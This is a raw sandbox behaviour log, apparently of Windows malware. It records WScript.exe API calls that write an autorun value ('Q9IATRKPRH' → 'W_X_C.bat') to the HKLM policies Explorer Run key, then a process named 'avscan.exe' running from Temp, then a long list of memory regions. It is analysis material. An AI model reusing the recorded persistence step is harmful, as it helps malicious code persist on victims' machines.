0x0 [0143.166] IUnknown:Release (This=0x13e4d8) returned 0x1 [0143.167] _strnicmp (_Str1="") | out: lpVersionInformation=0x3ed600*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0143.243] GetUserDefaultLCID () returned 0x409 [0143.243] DllGetClassObject (in: rclsid=0xa38e8c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x3ee6d0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3edd88 | out: ppv=0x3edd88*=0x2430488) returned 0x0 [0143.243] ??2@YAPAXI@Z () returned 0x2430488 [0143.244] WshShell:IUnknown:AddRef (This=0x2430488) returned 0x2 [0143.244] WshShell:IUnknown:Release (This=0x2430488) returned 0x1 [0143.244] WshShell:IUnknown:QueryInterface (in: This=0x2430488, riid=0x72c14174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3ee94c | out: ppvObject=0x3ee94c*=0x2430488) returned 0x0 [0143.244] WshShell:IUnknown:Release (This=0x2430488) returned 0x1 [0143.244] ??2@YAPAXI@Z () returned 0x24304a0 [0143.244] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3ee8a8, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\WScript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")) returned 0x1f [0143.244] lstrlenA (lpString="\\wscript.exe") returned 12 [0143.245] lstrlenA (lpString="C:\\Windows\\SysWOW64\\WScript.exe") returned 31 [0143.245] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0 [0143.245] GetModuleHandleA (lpModuleName=0x0) returned 0x7f0000 [0143.245] GetProcAddress (hModule=0x7f0000, lpProcName=0x1) returned 0x7f2bb9 [0143.245] ??3@YAXPAX@Z () returned 0x1 [0143.245] ??2@YAPAXI@Z () returned 0x24330c8 [0143.246] LoadRegTypeLib (in: rguid=0x729114bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x3eea0c*=0x0 | out: pptlib=0x3eea0c*=0xa48110) returned 0x0 [0143.252] ITypeLib:GetTypeInfoOfGuid (in: This=0xa48110, GUID=0x729114cc*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x3ee9f0 | out: ppTInfo=0x3ee9f0*=0xa498ac) returned 0x0 [0143.252] ITypeInfo:GetRefTypeOfImplType (in: This=0xa498ac, index=0xffffffff, pRefType=0x3ee9e4 | out: pRefType=0x3ee9e4*=0xfffffffe) returned 0x0 [0143.252] ITypeInfo:GetRefTypeInfo (in: This=0xa498ac, hreftype=0xfffffffe, ppTInfo=0x7292501c | out: ppTInfo=0x7292501c*=0xa498d8) returned 0x0 [0143.252] IUnknown:Release (This=0xa498ac) returned 0x1 [0143.252] IUnknown:Release (This=0xa48110) returned 0x1 [0143.252] IUnknown:AddRef (This=0xa498d8) returned 0x2 [0143.253] ITypeInfo:LocalGetIDsOfNames (This=0xa498d8) returned 0x0 [0143.253] IUnknown:Release (This=0xa498d8) returned 0x1 [0143.253] IUnknown:AddRef (This=0xa498d8) returned 0x2 [0143.253] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0143.253] ITypeInfo:LocalInvoke (This=0xa498d8) returned 0x0 [0143.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_SZ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_SZ", cchWideChar=-1, lpMultiByteStr=0x3ee690, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_SZ", lpUsedDefaultChar=0x0) returned 7 [0143.254] lstrcmpA (lpString1="REG_SZ", lpString2="REG_SZ") returned 0 [0143.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0143.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x3ee660, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 94 [0143.254] _mbsnbcmp (_Str1=0x3ee660, _Str2=0x729121e8, _MaxCount=0x5) returned 2 [0143.254] _mbsnbcmp (_Str1=0x3ee660, _Str2=0x729121f0, _MaxCount=0x5) returned -7 [0143.254] _mbsnbcmp (_Str1=0x3ee660, _Str2=0x729121f8, _MaxCount=0x5) returned 2 [0143.254] _mbsnbcmp (_Str1=0x3ee660, _Str2=0x72912200, _MaxCount=0x12) returned 9 [0143.254] _mbsnbcmp (_Str1=0x3ee660, _Str2=0x72912214, _MaxCount=0x13) returned 0 [0143.255] memcpy (in: _Dst=0x3ee5e0, _Src=0x3ee673, _Size=0x3f | out: _Dst=0x3ee5e0) returned 0x3ee5e0 [0143.255] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x3ee638, lpdwDisposition=0x0 | out: phkResult=0x3ee638*=0x190, lpdwDisposition=0x0) returned 0x0 [0143.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W_X_C.bat", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W_X_C.bat", cchWideChar=-1, lpMultiByteStr=0x3ee650, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="W_X_C.bat", lpUsedDefaultChar=0x0) returned 10 [0143.256] lstrlenA (lpString="W_X_C.bat") returned 9 [0143.256] RegSetValueExA (in: hKey=0x190, lpValueName="Q9IATRKPRH", Reserved=0x0, dwType=0x1, lpData="W_X_C.bat", cbData=0xa | out: lpData="W_X_C.bat") returned 0x0 [0143.256] RegCloseKey (hKey=0x190) returned 0x0 [0143.257] IUnknown:Release (This=0xa498d8) returned 0x1 [0143.257] GetCurrentThreadId () returned 0xbcc [0143.258] ??3@YAXPAX@Z () returned 0x1 [0143.258] ISystemDebugEventFire:IsActive (This=0xa295c8) returned 0x1 [0143.305] GetCurrentThreadId () returned 0xbcc [0143.305] IUnknown:Release (This=0xa498d8) returned 0x0 [0143.306] ??3@YAXPAX@Z () returned 0x1 [0143.306] free (_Block=0x132ec0) [0143.306] free (_Block=0x132f08) [0143.306] ??3@YAXPAX@Z () returned 0x1 [0143.306] ??3@YAXPAX@Z () returned 0x1 [0143.306] ISystemDebugEventFire:EndSession (This=0xa295c8) returned 0x0 [0143.306] IUnknown:Release (This=0xa295c8) returned 0x1 [0143.307] GetUserDefaultLCID () returned 0x409 [0143.307] GetACP () returned 0x4e4 [0143.307] ??3@YAXPAX@Z () returned 0x1 [0143.307] ??3@YAXPAX@Z () returned 0x1 [0143.307] ??3@YAXPAX@Z () returned 0x1 [0143.308] ??3@YAXPAX@Z () returned 0x1 [0143.308] free (_Block=0x2430660) [0143.308] ??3@YAXPAX@Z () returned 0x1 [0143.308] ??3@YAXPAX@Z () returned 0x1 [0143.308] IUnknown:Release (This=0xa295c8) returned 0x0 [0143.309] free (_Block=0x2430048) [0143.309] ??3@YAXPAX@Z () returned 0x1 [0143.309] SendMessageA (hWnd=0x501fa, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0143.309] SendMessageA (hWnd=0x501fa, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0143.309] PostMessageA (hWnd=0x501fa, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0143.312] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x3ef5b0*=0xf8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0143.312] CloseHandle (hObject=0xf8) returned 1 [0143.312] ??3@YAXPAX@Z () returned 0x1 [0143.313] IUnknown:Release (This=0xa30ed0) returned 0x0 [0143.313] ??3@YAXPAX@Z () returned 0x1 [0143.313] IUnknown:Release (This=0xa30f28) returned 0x0 [0143.313] ??3@YAXPAX@Z () returned 0x1 [0143.313] IUnknown:Release (This=0xa30f80) returned 0x0 [0143.314] ??3@YAXPAX@Z () returned 0x1 [0143.314] IUnknown:Release (This=0xa30e78) returned 0x0 [0143.314] ??3@YAXPAX@Z () returned 0x1 [0143.315] ??3@YAXPAX@Z () returned 0x1 [0143.315] ??3@YAXPAX@Z () returned 0x1 [0143.315] ??3@YAXPAX@Z () returned 0x1 [0143.315] GetProcessHeap () returned 0xa10000 [0143.315] HeapFree (in: hHeap=0xa10000, dwFlags=0x0, lpMem=0xa355e8 | out: hHeap=0xa10000) returned 1 [0143.315] ??3@YAXPAX@Z () returned 0x1 [0143.315] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x3ef5d0 | out: lplpMessageFilter=0x3ef5d0*=0x131348) returned 0x0 [0143.316] ??3@YAXPAX@Z () returned 0x1 [0143.316] ??3@YAXPAX@Z () returned 0x1 [0143.316] ??3@YAXPAX@Z () returned 0x1 [0143.316] CoUninitialize () [0143.316] DllCanUnloadNow () returned 0x0 [0143.316] DllCanUnloadNow () returned 0x0 [0143.316] ??3@YAXPAX@Z () returned 0x1 [0143.316] DllCanUnloadNow () returned 0x0 [0143.317] free (_Block=0x2431168) [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??2@YAPAXI@Z () returned 0x2430048 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.321] ??3@YAXPAX@Z () returned 0x1 [0143.322] free (_Block=0x13e178) [0143.373] free (_Block=0x2430a68) [0143.374] ??3@YAXPAX@Z () returned 0x1 [0143.374] ??3@YAXPAX@Z () returned 0x1 [0143.374] ??3@YAXPAX@Z () returned 0x1 [0145.567] ??3@YAXPAX@Z () returned 0x1 [0145.568] free (_Block=0x132950) [0145.573] ExitProcess (uExitCode=0x0) [0145.576] free (_Block=0x133598) Thread: id = 65 os_tid = 0xba0 Thread: id = 66 os_tid = 0xb90 [0141.437] GetClassInfoA (in: hInstance=0x7f0000, lpClassName="WSH-Timer", lpWndClass=0x242f87c | out: lpWndClass=0x242f87c) returned 0 [0141.437] RegisterClassA (lpWndClass=0x242f87c) returned 0x2ac1c6 [0141.437] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x7f0000, lpParam=0x132598) returned 0x501fa [0141.438] GetWindowLongA (hWnd=0x501fa, nIndex=-21) returned 0 [0141.439] NtdllDefWindowProc_A (hWnd=0x501fa, Msg=0x24, wParam=0x0, lParam=0x242f470) returned 0x0 [0141.439] GetWindowLongA (hWnd=0x501fa, nIndex=-21) returned 0 [0141.439] SetWindowLongA (hWnd=0x501fa, nIndex=-21, dwNewLong=1254808) returned 0 [0141.439] NtdllDefWindowProc_A (hWnd=0x501fa, Msg=0x81, wParam=0x0, lParam=0x242f464) returned 0x1 [0141.441] GetWindowLongA (hWnd=0x501fa, nIndex=-21) returned 1254808 [0141.441] NtdllDefWindowProc_A (hWnd=0x501fa, Msg=0x83, wParam=0x0, lParam=0x242f450) returned 0x0 [0141.447] GetWindowLongA (hWnd=0x501fa, nIndex=-21) returned 1254808 [0141.447] NtdllDefWindowProc_A (hWnd=0x501fa, Msg=0x1, wParam=0x0, lParam=0x242f464) returned 0x0 [0141.447] SetEvent (hEvent=0xf0) returned 1 [0141.467] GetMessageA (in: lpMsg=0x242f8a4, hWnd=0x501fa, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x242f8a4) returned 0 [0143.309] GetWindowLongA (hWnd=0x501fa, nIndex=-21) returned 1254808 [0143.309] GetWindowLongA (hWnd=0x501fa, nIndex=-21) returned 1254808 Thread: id = 67 os_tid = 0xb64 Thread: id = 68 os_tid = 0xbd8 Process: id = "9" image_name = "avscan.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe" page_root = "0x19230000" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xfd4" cmd_line = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1565 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1566 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1567 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1568 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1569 start_va = 0x90000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1570 start_va = 0x400000 end_va = 0xde0fff monitored = 1 entry_point = 0xdded44 region_type = mapped_file name = "avscan.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") Region: id = 1571 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1572 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1573 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1574 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1575 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1576 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1577 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1578 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1579 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1580 start_va = 0x290000 end_va = 0x293fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1581 start_va = 0xdf0000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1582 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1583 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1584 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1585 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1586 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1587 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1588 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1589 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1590 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1591 start_va = 0xf70000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 1592 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1593 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1594 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1595 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1596 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1597 start_va = 0x2a0000 end_va = 0x306fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1598 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1599 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1600 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1601 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1602 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1603 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1604 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1605 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1606 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1607 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1608 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1609 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1610 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1611 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1612 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1613 start_va = 0x72940000 end_va = 0x72a92fff monitored = 1 entry_point = 0x72941af8 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1614 start_va = 0x1270000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1615 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1616 start_va = 0x13b0000 end_va = 0x1537fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 1617 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1618 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1619 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1620 start_va = 0x1540000 end_va = 0x16c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001540000" filename = "" Region: id = 1621 start_va = 0x16d0000 end_va = 0x2acffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016d0000" filename = "" Region: id = 1622 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1623 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1624 start_va = 0x2ad0000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1625 start_va = 0x2cc0000 end_va = 0x30bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 1626 start_va = 0x30c0000 end_va = 0x338efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1627 start_va = 0x1270000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1628 start_va = 0x13a0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 1629 start_va = 0x2ad0000 end_va = 0x2caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1630 start_va = 0x2cb0000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 1631 start_va = 0x75410000 end_va = 0x75493fff monitored = 0 entry_point = 0x754119a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1632 start_va = 0x3570000 end_va = 0x357ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 1633 start_va = 0x75400000 end_va = 0x75404fff monitored = 0 entry_point = 0x754011d0 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: 